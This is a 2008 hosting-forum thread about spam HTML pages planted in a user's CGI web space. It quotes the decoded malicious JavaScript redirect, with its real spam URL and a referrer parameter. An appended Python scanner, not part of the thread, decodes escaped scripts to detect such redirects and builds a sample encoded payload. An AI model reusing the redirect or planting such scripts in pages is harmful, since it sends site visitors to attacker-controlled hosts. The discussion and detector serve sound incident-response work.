CCGI Hacked ?
17-01-2008 2:11 PM
The directories the new folders and files were created in had permissions set to 755 so anyone else shouldn't really be able to upload files to them.
Whatever is placing these files on the server is putting them deep in the directory paths; I had to list deep in directories to find them. I am also at a loss to know if I should leave these files on the server for inspection by F9 staff or if I should delete them.
Re: CCGI Hacked ?
17-01-2008 2:42 PM
Re: CCGI Hacked ?
17-01-2008 2:48 PM
Quote from: Marteknet: "The directories the new folders and files were created in had permissions set to 755 so anyone else shouldn't really be able to upload files to them."
I suspect you've fallen foul of this which can still be a problem irrespective of your permissioning.
Bob Pullen
Plusnet Product Team
Re: CCGI Hacked ?
17-01-2008 3:32 PM
I have looked at the folder/directory structure and can not see anything that I do not recognise.
Have you any example filenames?
Re: CCGI Hacked ?
18-01-2008 12:21 AM
Thanks for looking, Tony. Here are some file names for you.
alltel-1.html
alltell.html
blackberry-1.html
bollywood-1.html
boost-1.html
boost-2.html
boost.html
boostmobile.html
cheap-1.html
cheap.html
classical.html
composer-1.html
converter-1.html
converter.html
country-1.html
cricket-2.html
free-1.html
In these HTML files there is escaped JavaScript that, when unescaped, shows a URL redirect to
"http://noril.info/noru.php?kwa=9&dfkw=alltel&crdt=070101&said=stb07&rf=" + document.referrer;
Thanks for the info, Bob. I will be checking my websites' user inputs and make sure every one of them uses some form of input validation for all potentially malicious data. I am fairly sure that this is in place but will be checking it anyway to make sure that the weakness is not in my scripts.
Moderator's note by James_H: Made link unclickable
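A defensive check for the kind of file described in the post above, added here as an example and not part of the original thread: it decodes string literals passed to `unescape()` in HTML files and reports those that decode to a client-side redirect. The function names, the sample page and its placeholder host are constructed for illustration.

```python
import os
import re

# String literals passed to unescape()/decodeURIComponent() inside a page.
CALL_RE = re.compile(r"""(?:unescape|decodeURIComponent)\(\s*(["'])(.*?)\1\s*\)""", re.S)
ESC_RE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")
# Signs of a client-side redirect in the decoded script.
SINK_RE = re.compile(r"location(?:\.href)?\s*=|location\.(?:replace|assign)\(|document\.referrer", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)

def js_unescape(text):
    """Decode %XX and %uXXXX the way JavaScript's unescape() does."""
    return ESC_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)

def find_hidden_redirects(html):
    """Return (decoded_script, urls) for each escaped literal that decodes to a redirect."""
    findings = []
    for match in CALL_RE.finditer(html):
        decoded = js_unescape(match.group(2))
        if SINK_RE.search(decoded):
            findings.append((decoded, URL_RE.findall(decoded)))
    return findings

def scan_tree(root):
    """Walk a web root and map each suspicious .html/.htm file to its findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".html", ".htm")):
                path = os.path.join(dirpath, name)
                # latin-1 never fails to decode, so odd bytes cannot abort the scan
                with open(path, encoding="latin-1") as handle:
                    hits = find_hidden_redirects(handle.read())
                if hits:
                    report[path] = hits
    return report

# Constructed sample: a page whose script is percent-encoded (placeholder host).
PLAIN_SCRIPT = 'document.location="http://redirector.example.invalid/r.php?rf="+document.referrer;'
SAMPLE = '<html><script>eval(unescape("%s"))</script></html>' % "".join("%%%02X" % ord(c) for c in PLAIN_SCRIPT)

if __name__ == "__main__":
    for script, urls in find_hidden_redirects(SAMPLE):
        print("redirect hidden in escaped script:", urls)
```

Running `scan_tree()` over a copy of the web space lists every file that needs a closer look without opening any of them in a browser.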
Re: CCGI Hacked ?
18-01-2008 6:30 AM
It seems that I am not affected.
Have you got any further with finding out how you got this? Searching Google for bits of the unescaped address turns up nothing useful.
As you say, putting some of the filenames into Google confirms that they are ringtone related, but does not give any indication of why they should be in your ccgi area.
Re: CCGI Hacked ?
18-01-2008 9:59 AM
Re: CCGI Hacked ?
18-01-2008 10:06 AM
Also, you could delete them and see if they later appear.
Is there any way with the (CHMOD) permissions that they can not be read/overwritten/modified by the perpetrators?
Re: CCGI Hacked ?
18-01-2008 10:41 AM
This should protect the directories from being altered across domains. But as Bob pointed out, there may be issues with web page inputs, and someone may be priming an input with code that bypasses the cross-domain protection. Once the script has been uploaded via the input it may be stored in a SQL database or on a dynamic web page, and then when called this will then execute the script on the server and, hey presto, because it is now essentially on the same domain it has full access. Whether the HTML page with the input is on one of my pages is uncertain, but to be sure I will be taking a look at all my input page routines and make sure that I have code to parse them for script content. Not a small job. I am not too sure if once someone has got access to a user's ccgi web space they can access everyone's web space on the same server, but I guess it may be possible.
I have been contacted by support (24 + hours after reporting) and asked NOT to delete the files. I am still awaiting more feedback from them on this issue.
Dates of the files are:
19/11/07
20/11/07
13/12/07
17/01/08
So this is an ongoing thing. I will be looking at my tracking for yesterday (17/1/08) to see if I can find out if there was any unusual traffic on any web pages I own.
I will post any relevant info here as I get it.
Re: CCGI Hacked ?
18-01-2008 2:18 PM
Quote from: Marteknet: "Not a small job. I am not too sure if once someone has got access to a user's ccgi web space they can access everyone's web space on the same server but I guess it may be possible."
No, this isn't possible AFAIK (it used to be to a certain degree with the old CGI platform).
Quote: "I have been contacted by support (24 + hours after reporting) and asked NOT to delete the files. I am still awaiting more feedback from them on this issue."
I don't hold too much faith that we'll be able to help aside from perhaps pointing out some vulnerabilities in your scripts. Identifying the origin of the attack if it is XSS related is likely to be impossible.
Bob Pullen
Plusnet Product Team
Re: CCGI Hacked ?
19-01-2008 12:22 AM
But all in all they were a great help. Thanks, Bob, for the info and the link you gave in your earlier post to this thread.